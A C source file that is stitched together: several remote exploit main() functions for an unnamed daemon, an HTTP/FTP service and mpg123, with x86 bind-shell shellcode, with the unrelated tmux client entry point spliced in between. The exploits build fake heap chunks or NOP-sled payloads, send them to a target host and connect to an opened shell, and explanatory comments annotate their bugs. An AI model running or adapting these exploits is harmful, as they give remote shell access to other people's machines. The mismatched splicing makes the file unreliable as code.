		 "\x43"                            /* incl %ebx */
		 "\xb0\x66"                  /* movb $0x66, %al */
		 "\xcd\x80"                        /* int $0x80 */
		 //------------------ accept() -----------------//
		 "\x89\x56\x0c"        /* movl %edx, 0x0c(%esi) */
		 "\x89\x56\x10"        /* movl %edx, 0x10(%esi) */
		 "\xb0\x66"                  /* movb $0x66, %al */
		 "\x43"                            /* incl %ebx */
		 "\xcd\x80"                        /* int $0x80 */
		 //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----//
		 "\x86\xc3"                   /* xchgb %al, %bl */
		 "\xb0\x3f"                  /* movb $0x3f, %al */
		 "\x29\xc9"                  /* subl %ecx, %ecx */
		 "\xcd\x80"                        /* int $0x80 */
		 "\xb0\x3f"                  /* movb $0x3f, %al */
		 "\x41"                            /* incl %ecx */
		 "\xcd\x80"                        /* int $0x80 */
		 "\xb0\x3f"                  /* movb $0x3f, %al */
		 "\x41"                            /* incl %ecx */
		 "\xcd\x80"                        /* int $0x80 */
		 //------------------ execve() -----------------//
		 "\x88\x56\x07"         /* movb %dl, 0x07(%esi) */
		 "\x89\x76\x0c"        /* movl %esi, 0x0c(%esi) */
		 "\x87\xf3"                 /* xchgl %esi, %ebx */
		 "\x8d\x4b\x0c"        /* leal 0x0c(%ebx), %ecx */
		 "\xb0\x0b"                  /* movb $0x0b, %al */
		 "\xcd\x80"                        /* int $0x80 */
		 //------------------- callz: ------------------//
		 "\xe8\x89\xff\xff\xff"           /* call start */
		 "/bin/sh"; /* 128byte */

/* Function-like macro expanding to `x0x+=4`; used both as a statement and
   as a for-loop increment below. */
#define plus_4str(x0x) x0x+=4
    int x0x_num=0;
    /* x0x_size, debug_test, nop_n_jump, p_rev_size and size_fd are
       declared but never referenced. */
    int x0x_size=0;
#define BUF_LEN 1024
    char *debug_test;
    char code_128len[BUF_LEN];
    /* Sixteen bytes and no NUL terminator: the strlen() on this array
       below reads past its end (undefined behaviour). Values above 127
       stored into a plain char are implementation-defined where char is
       signed. */
    char x82_16x0x[]={ /* 16byte */
		 0x82,0x82,0x82,0x82,0x82,
		 0x82,0x82,0x82,0x82,0x82,
		 0x82,0x82,0x82,0x82,0x82,
		 0x82
    };
    char nop_n_jump[4]={0x41,0xeb,0x0c,0x42};
    int nop_12jump=0;
    int ok_cont=0;
    int target_type_number=0;
    char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */
    char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */
    char atk_chunk[BUF_LEN];
    unsigned long retloc=pl_form[target_type_number].retloc;
    unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr;

    memset(ttatk_code,0x00,36864);
    memset(atk_chunk,0x00,BUF_LEN);
    memset(code_128len,0x00,BUF_LEN);

    (void)banrl(argv[0]);
    while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF)
    {
		 switch(roup)
		 {
		     case 'R':
		     case 'r':
		 		 retloc=strtoul(optarg,NULL,0);
		 		 break;

		     case 'S':
		     case 's':
		 		 retaddr=strtoul(optarg,NULL,0);
		 		 break;

		     case 'H':
		     case 'h':
		 		 /* Copies the full 0x82 bytes, so an optarg of 0x82 or more
		 		    characters leaves hostname without a NUL terminator. */
		 		 memset(hostname,0x00,0x82);
		 		 strncpy(hostname,optarg,0x82);
		 		 break;

		     case 'P':
		     case 'p':
		 		 port=atoi(optarg);
		 		 break;

		     case '?':
		 		 (void)usage(argv[0]);
		 		 break;
		 }
    }

    //--- make fake chunk ---//
    fprintf(stdout," [1] Make fake chunk.\n");
    /* strlen() here runs off the unterminated 16-byte array (see above);
       the loop bound depends on whatever follows it in memory. */
    for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++)
		 atk_chunk[x0x_num]=x82_16x0x[x0x_num];
    /* Type-punned, possibly unaligned stores through a long pointer;
       presumably assumes a 32-bit long (4-byte stores). */
    *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P)
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer
    plus_4str(x0x_num);
    *(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer
    plus_4str(x0x_num);

    //--- make code ---//
    fprintf(stdout," [2] Make shellcode.\n");
    /* 0x190 (400) bytes of a repeated 4-byte pattern, then main_str
       appended from offset 400 of the 1024-byte buffer. */
    for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump))
		 *(long*)&code_128len[nop_12jump]=0x41eb0c42;
    for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++)
		 code_128len[ok_cont++]=main_str[x0x_num];

    //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---//
    /* %s stops at the first zero byte of each buffer. */
    snprintf(ttatk_code,36864,
		     "%s%s%s\r\n",atk_chunk,"\x20",code_128len);

    fprintf(stdout," [3] Send exploit (bindshell) code.\n");
    { // Try two times connections. It's Point. :-)
		 /* 1 */
		 at_sock=setsock(hostname,port);
		 re_conenter(at_sock);
		 /* send() return values are not checked. */
		 send(at_sock,ttatk_code,strlen(ttatk_code),0);
		 close(at_sock);
		 /* 2 */
		 at_sock=setsock(hostname,port);
		 re_conenter(at_sock);
		 send(at_sock,ttatk_code,strlen(ttatk_code),0);
    }
    fprintf(stdout," [4] Waiting, executes the shell !\n");
    sleep(3);
    fprintf(stdout," [5] Trying %s:36864 ...\n",hostname);
    /* 3 */
    ts_sock=setsock(hostname,36864);
    re_conenter(ts_sock);
    fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname);
    // Execute bash shell
    getshell(ts_sock);

    /* No return statement: under C99 and later, reaching the end of
       main() returns 0. */
}
/*
 * Client entry point: require a UTF-8 character locale, parse the
 * command line into the CLIENT_* flags, open the pty master fd and
 * pledge, initialise the global hooks, environment and option trees,
 * resolve the server socket path (-S, -L, $TMUX or the default label)
 * and hand over to client_main(). Exits with client_main()'s status;
 * -V prints the version and exits 0; locale, getptmfd, pledge or socket
 * path failures exit 1.
 */
int
main(int argc, char **argv)
{
	static const char *const		 locale_vars[] =
	    { "LC_ALL", "LC_CTYPE", "LANG" };
	char					*path = NULL, *label = NULL;
	char					*shellcmd = NULL, **envp;
	char					 cwd[PATH_MAX];
	const char				*env, *value, *base, *codeset;
	int					 ch, flags, modekeys;
	const struct options_table_entry	*entry;
	size_t					 i;

	/*
	 * Prefer en_US.UTF-8; otherwise accept the user's locale only if its
	 * codeset is UTF-8.
	 */
	if (setlocale(LC_CTYPE, "en_US.UTF-8") == NULL) {
		if (setlocale(LC_CTYPE, "") == NULL)
			errx(1, "invalid LC_ALL, LC_CTYPE or LANG");
		codeset = nl_langinfo(CODESET);
		if (strcasecmp(codeset, "UTF-8") != 0 &&
		    strcasecmp(codeset, "UTF8") != 0)
			errx(1, "need UTF-8 locale (LC_CTYPE) but have %s",
			    codeset);
	}

	setlocale(LC_TIME, "");
	tzset();

	/* A leading '-' in argv[0] means we were started as a login shell. */
	flags = (**argv == '-') ? CLIENT_LOGIN : 0;

	while ((ch = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) {
		switch (ch) {
		case 'V':
			printf("%s %s\n", getprogname(), VERSION);
			exit(0);
		case '2':
			flags |= CLIENT_256COLOURS;
			break;
		case 'u':
			flags |= CLIENT_UTF8;
			break;
		case 'l':
			flags |= CLIENT_LOGIN;
			break;
		case 'C':
			/* A second -C upgrades control mode to control-control. */
			flags |= (flags & CLIENT_CONTROL) ?
			    CLIENT_CONTROLCONTROL : CLIENT_CONTROL;
			break;
		case 'c':
			free(shellcmd);
			shellcmd = xstrdup(optarg);
			break;
		case 'f':
			set_cfg_file(optarg);
			break;
		case 'L':
			free(label);
			label = xstrdup(optarg);
			break;
		case 'S':
			free(path);
			path = xstrdup(optarg);
			break;
		case 'v':
			log_add_level();
			break;
		case 'q':
			/* Accepted but has no effect. */
			break;
		default:
			usage();
		}
	}
	argc -= optind;
	argv += optind;

	/* -c and a command given as arguments are mutually exclusive. */
	if (shellcmd != NULL && argc != 0)
		usage();

	/* Open the pty master before dropping privileges via pledge. */
	ptm_fd = getptmfd();
	if (ptm_fd == -1)
		err(1, "getptmfd");
	if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd "
	    "recvfd proc exec tty ps", NULL) != 0)
		err(1, "pledge");

	/*
	 * Inside tmux ($TMUX set) the terminal is UTF-8 by definition.
	 * Otherwise take the first non-empty of LC_ALL, LC_CTYPE and LANG
	 * and look for a UTF-8 marker in it: the user either has a UTF-8
	 * terminal or knows output from UTF-8-capable programs may be wrong.
	 */
	if (getenv("TMUX") != NULL)
		flags |= CLIENT_UTF8;
	else {
		env = "";
		for (i = 0; i < sizeof locale_vars / sizeof locale_vars[0]; i++) {
			value = getenv(locale_vars[i]);
			if (value != NULL && *value != '\0') {
				env = value;
				break;
			}
		}
		if (strcasestr(env, "UTF-8") != NULL ||
		    strcasestr(env, "UTF8") != NULL)
			flags |= CLIENT_UTF8;
	}

	global_hooks = hooks_create(NULL);

	/* Seed the global environment from the process environment. */
	global_environ = environ_create();
	for (envp = environ; *envp != NULL; envp++)
		environ_put(global_environ, *envp);
	if (getcwd(cwd, sizeof cwd) != NULL)
		environ_set(global_environ, "PWD", "%s", cwd);

	/* Populate each option tree with the defaults for its scope. */
	global_options = options_create(NULL);
	global_s_options = options_create(NULL);
	global_w_options = options_create(NULL);
	for (entry = options_table; entry->name != NULL; entry++) {
		switch (entry->scope) {
		case OPTIONS_TABLE_SERVER:
			options_default(global_options, entry);
			break;
		case OPTIONS_TABLE_SESSION:
			options_default(global_s_options, entry);
			break;
		case OPTIONS_TABLE_WINDOW:
			options_default(global_w_options, entry);
			break;
		default:
			break;
		}
	}

	/*
	 * The default shell comes from SHELL or from the user's passwd entry
	 * if available.
	 */
	options_set_string(global_s_options, "default-shell", 0, "%s",
	    getshell());

	/* VISUAL, then EDITOR, selects vi or emacs key bindings. */
	env = getenv("VISUAL");
	if (env == NULL)
		env = getenv("EDITOR");
	if (env != NULL) {
		/* Only the basename of the editor is inspected. */
		base = strrchr(env, '/');
		if (base != NULL)
			env = base + 1;
		modekeys = (strstr(env, "vi") != NULL) ?
		    MODEKEY_VI : MODEKEY_EMACS;
		options_set_number(global_s_options, "status-keys", modekeys);
		options_set_number(global_w_options, "mode-keys", modekeys);
	}

	/*
	 * -S or -L win. Otherwise the socket path is the part of $TMUX
	 * before the first comma, and failing that make_label() builds the
	 * default.
	 */
	if (path == NULL && label == NULL) {
		env = getenv("TMUX");
		if (env != NULL && *env != '\0' && *env != ',') {
			path = xstrdup(env);
			path[strcspn(path, ",")] = '\0';
		}
	}
	if (path == NULL) {
		path = make_label(label);
		if (path == NULL) {
			fprintf(stderr, "can't create socket: %s\n",
			    strerror(errno));
			exit(1);
		}
	}
	socket_path = path;
	free(label);

	/* Pass control to the client. */
	exit(client_main(osdep_event_init(), argc, argv, flags, shellcmd));
}
/*
 * Entry point. Options: -t/-T target index, -h/-H host, -u user,
 * -a password, -c directory, -p/-P port, -i/-I hint, -? usage. Names
 * from elsewhere: D_PORT, D_HOST, __pl_form[], shell[], user, pass,
 * writedir, banrl(), x_fp_rm_usage(), printe(), sock_connect(),
 * ftp_parse(), getshell().
 */
int main(int argc,char *argv[])
{
int port=D_PORT;
/* D_HOST must expand to a string literal for this initialiser. */
char hostname[0x333]=D_HOST;
int whlp,type=0;
/* i and buf are never used. */
unsigned int i=0;
char buf[141];
char buf2[2078];
char sendbuf[3150];
char buf3[141];
int sd;
int ftpsd;
/* __pl_form is a reserved identifier (double underscore). */
u_long retaddr=__pl_form[type].retaddr;

(void)banrl();
/* getopt() returns -1 at the end; EOF is -1 on typical platforms. */
while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF)
{
extern char *optarg;
switch(whlp)
{
case 'T':
case 't':
/* Only the upper bound is checked: a negative atoi() result passes `<6`
   and indexes __pl_form[] with a negative subscript. */
if((type=atoi(optarg))<6)
{
retaddr=__pl_form[type].retaddr;
}
else (void)x_fp_rm_usage(argv[0]);
break;

case 'H':
case 'h':
/* Zero-filled first and copied with sizeof-1, so always NUL-terminated. */
memset((char *)hostname,0,sizeof(hostname));
strncpy(hostname,optarg,sizeof(hostname)-1);
break;

/* For -u/-a/-c only the first occurrence is kept (`!user&&`); the
   strdup() cast is unnecessary in C. These globals are consumed by
   ftp_parse(). */
case 'u':
 if(!user&&!(user=(char *)strdup(optarg)))
  printe("main(): allocating memory failed.",1);
 break;
case 'a':
 if(!pass&&!(pass=(char *)strdup(optarg)))
  printe("main(): allocating memory failed.",1);
 break;
case 'c':
 if(!writedir&&!(writedir=(char *)strdup(optarg)))
  printe("main(): allocating memory failed.",1);
 break;

case 'P':
case 'p':
port=atoi(optarg);
break;

case 'I':
case 'i':
fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
exit(-1);

case '?':
(void)x_fp_rm_usage(argv[0]);
break;
}
}

if(!strcmp(hostname,D_HOST))
{
(void)x_fp_rm_usage(argv[0]);
}
else
{
fprintf(stdout," [+] Hostname: %s\n",hostname);
fprintf(stdout," [+] Port num: %d\n",port);
/* %p with a u_long argument is a format/argument type mismatch. */
fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
}

fprintf(stdout," [1] #1 Set codes.\n");
 ftpsd=sock_connect(hostname,21);
 ftp_parse(ftpsd);
 /* All 141 bytes of buf3 are filled and no NUL is written, so each %s of
    buf3 below reads past the array until it finds a zero byte. */
 memset(buf3,0x42,141); 
 /* buf2 is 2078 bytes: 1000 + strlen(shell) + 1000 must fit, and no NUL
    is written, so %s relies on uninitialised stack bytes after it. */
 memset(buf2,0x90,1000);
 memcpy(buf2+1000,shell,strlen(shell));
 memset(buf2+1000+strlen(shell),0x90,1000);
 snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2);
 fprintf(stdout," [1] #1 Set socket.\n");

 sd=sock_connect(hostname,port);
fprintf(stdout," [1] #1 Send codes.\n");
 /* Writes the whole 3150-byte buffer regardless of the formatted length
    (bytes after the terminator are uninitialised); return unchecked. */
 write(sd,sendbuf,3150);

 close(sd);
 sleep(10);
fprintf(stdout," [1] #3 Get shell.\n");
 getshell(hostname,26112);
 exit(0);

}
/* start of operations.                                            */
/*
 * Entry point. Options: -p port, -s shellcode port, -g GOT address (hex),
 * -r request address (hex), -+ offset, -t target index, -l list targets.
 * Globals used but declared elsewhere: port, sport, gotaddr, requestaddr,
 * retoffset, target[], x86_exec[]; functions usage(), platform_list(),
 * audioserver_bind(), getshell().
 */
int main(int argc,char **argv){
 unsigned int i=0;
 int chr=0;
 char *hostptr, *nameptr="none";
 printf("[*] mpg123[v0.59r,v0.59s]: remote client-side heap corruption"
 " exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realh"
 "alo)\n\n");
 /* '+' as an option character is not portable getopt usage; behaviour
    depends on the platform's getopt(). */
 while((chr=getopt(argc,argv,"p:s:g:r:+:t:l"))!=EOF){
  switch(chr){
   case 'p':
    port=atoi(optarg);
    break;
   case 's':
    sport=atoi(optarg);
    break;
   case 'g':
    /* %x requires a pointer to unsigned int; the declared types of
       gotaddr and requestaddr are not visible here. */
    sscanf(optarg,"%x",&gotaddr);
    break;
   case 'r':
    sscanf(optarg,"%x",&requestaddr);
    break;
   case '+':
    retoffset=(atoi(optarg)*4);
    break;
   case 't':
    /* Count the NULL-terminated target table first. A negative atoi()
       result converts to a large unsigned value in the comparison and is
       rejected, which is the safe direction. */
    i=0;
    while(target[i].p_name)i++;
    if(atoi(optarg)>=i)
     printf("[!] %u is not a valid target, ignored.\n",atoi(optarg));
    else{
     nameptr=target[atoi(optarg)].p_name;
     gotaddr=target[atoi(optarg)].p_gotaddr;
     requestaddr=target[atoi(optarg)].p_requestaddr;
     retoffset=(target[atoi(optarg)].p_retoffset*4);
    }
    break;
   case 'l':
    platform_list();
    break;
   default:
    usage(argv[0]);
    break;
  }
 }
 /* usage() is assumed to exit; port is a global. */
 if(!port)usage(argv[0]);
 /* verbose display.                                               */
 printf("[*] platform value base\t\t: %s.\n",nameptr);
 printf("[*] fprintf GOT address\t\t: 0x%.8x.\n",gotaddr);
 printf("[*] *request address location\t: 0x%.8x.\n",requestaddr);
 printf("[*] *request offset(+?*4)\t: %u(=%u), ret=0x%.8x.\n\n",
 (retoffset/4),retoffset,(requestaddr+retoffset));
 /* set the bindshell port in the shellcode(byte 33/34).           */
 x86_exec[33]=(sport&0xff00)>>8;
 x86_exec[34]=(sport&0x00ff);
 /* audioserver_bind() returns the host that connected to it.      */
 hostptr=audioserver_bind();
 /* check the host for success, see if the bindshell is listening. */
 /* getshell() evidently returns when no shell is found, since the
    failure message follows it. */
 getshell(hostptr);
 printf("[!] exploit failed.\n");
 exit(0);
}